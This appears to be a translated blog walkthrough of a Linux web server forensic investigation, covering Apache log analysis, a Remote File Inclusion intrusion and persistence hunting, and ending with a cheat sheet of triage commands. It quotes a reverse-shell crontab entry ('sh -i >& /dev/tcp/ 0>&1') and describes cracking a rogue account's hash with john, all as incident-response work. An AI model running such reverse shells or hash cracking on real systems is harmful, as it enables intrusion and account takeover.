Before starting the Linux Server Analysis, the event we will go into is to examine a web server with Linux installed and additionally to look at Apache Log Analysis, Web Server Analysis, possible persistence mechanisms.

Here we will try to see potential web attacks by making inferences from both analysis in Linux and related web design.
The most important attack surface on the server is probably the web service; fortunately, the Apache access log keeps a history of all requests sent to the web server and includes:

1- source address
2- response code and length
3- user agent

We hooked up to our test machine.

The /var/log directory is always the first place I look when reviewing. For the subject I mentioned above, I go directly under the apache logs.

Access logs of course draw attention and I check. There is a lot of data, I need to do some customization.

What I mean by customization is the contains ones that catch my attention while browsing the logs in general, like nmap like dirbuster.

Or we can try to see general scanners with this command directly.

Now the interface of the web is as follows. For example, here I can easily find which directory will allow the user to upload files.

So, can I find which IP addresses upload files to this server?

If I look at the GET and POST requests in the access logs, I can see the IP addresses. Along with the response codes.
Among these requests, I can go to every directory that attracts my attention, or I can look at it from the terminal. One of the points that caught my attention was the file under resources/development/2021/docs/ and when I opened it and looked at it,

When I focused on the subject that caught my attention, when I continued to examine from the server terminal, look what I saw, it seems that the attacker entered with Remote File Inclusion (RFI).

Now, possible persistences that I will continue to check:

1- cron
2- services/systemd
3- bashrc
4- Kernel modules
5- SSH keys

You know their locations by heart because you are constantly struggling, but you don’t always have to know them by heart, of course, and you can find the path and directory in linux with the locate command directly.

As I said, you can tamper with the directory you want as much as you want.
The reason why I always say this is because linux systems are managed as command line (there are customized ones), anomalies on the system cannot be understood as easily as in Windows.

It is important to spend as much time in the directories as possible in order to dominate the directories and to solve the complexity of linux in this regard.
You will see that the correct path is /etc/crontab .

The trailing sh -i >& /dev/tcp/ 0>&1
has caught your attention.

The root2 user also catches my attention and I’m starting to look at the following locations, which are one of the few places in linux where account information is kept.
1- /etc/passwd — contains the names of most of the accounts on the system. It should only have read privileges and do not contain password hashes.
2- /etc/shadow — contains names but must also contain password hashes. Must have strict permissions.

There could also be more data in /etc/passwd, my goal is to find root2 I said with grep just get the root2 hash and now I’m going to use hash-identifier to find out what hash it is.

It says the hash-identifier algorithm is DES, let’s break it down then…

We cracked it with the john tool and found the second root account.
Now we are in the apache log analysis. The log files are smaller this time, we can say that the attacker is a little cunning.

As we spotted above, obvious user agents may not always be visible. However, there are several other ways to identify traffic originating from browsers. The time between each request is a good metric for most tools. You can also identify individual vehicles from signatures left in requests; for example, when performing certain enumeration tasks, Nmap sends HTTP requests with a random non-standard method. More aggressive means can also be identified from the number of requests sent during any given attack; Bruteforce tools and tools can also be detected in this way.
A poorly designed site can easily deliver important information without the need for aggressive tools. In this case, the site uses sequential IDs for all the products it produces. It easily identifies each product or finds the total size of the product database by incrementing the product ID until a 404 error occurs.

Now let’s look at the apache access logs on the following server again and you will understand what I mean.

I’m still looking for IP 192.168.56,206 because this absurd HTTP request confused me. “x16x03” 400 0 “-” “-” indicates nmap.

If there are any backdoors, SSH keys will show me that, it’s another excellent way to protect access, so additions to the authorized_keys file might be worth looking into.

Right guess.

In addition, the Program Execution history is another point worth looking into.
Of course, adding a public key to root’s authorized_keys requires root-level privileges, so it might be best to look for further evidence of privilege escalation. Overall, Linux stores a very small amount of program execution history compared to Windows, but there are still a few valuable resources, including:

  1. bash_history — Contains a history of commands run in Bash; this file is well known, easy to edit, and is sometimes disabled by default.
  2. auth.log — It contains a history of all commands run using sudo.
  3. history.log (apt) — Contains a history of all tasks performed using apt — useful for tracking program installation and uninstallation.

systemd services also keep logs in the log system; these logs are kept in binary format and must be read by a utility like Journalctl. This binary format comes with some advantages; however, each journal is capable of self-verification and is more difficult to change.

The malware can also maintain persistence using systemd, as scripts running under systemd run in the background and can be restarted when the system starts or the script crashes. It is also relatively easy to hide malicious scripts as they can interfere with other services. systemd services are defined in .service files, which may include:

  1. Command that runs every time the service starts
  2. User running the service
  3. Optional description

In this case, the malware is pretty obvious as it appears to be printing errors on the screen, so there’s no way it’s dormant. Running systemctl will list all the services installed on the system. And very similar to Windows, there are usually a lot of them. Might be worth adding to the command as it will reduce the list to running services. When the name of a suspicious service is found, more information can be extracted by running it. — type=service — state=activesystemctl status <service name>

OS Version Information

cat /etc/os-relase

User Accounts

cat /etc/passwd| column -t -s :

Group Information

cat /etc/group

Login Information

  • Failed logins: /var/log/btmp
  • Historical data of logins: /var/log/wtmp

sudo last -f /var/log/wtmp

System Configuration Information


cat /etc/hostname


cat /etc/timezone

Network Configuration

cat /etc/network/interfaces ip address show

Active Network Connection

netstat -natp

Aktive Running Processes

ps aux

DNS Information

cat /etc/hosts
cat /etc/resolv.conf

Started Services

ls /etc/init.d/

Sudo Execution History

cat /var/log/auth.log* |grep -i COMMAND|tail


cat /var/log/syslog* | head

Auth Log

cat /var/log/auth.log* |head

We have touched on the linux forensics side superficially. In the next article, we will look at Linux Forensic in depth.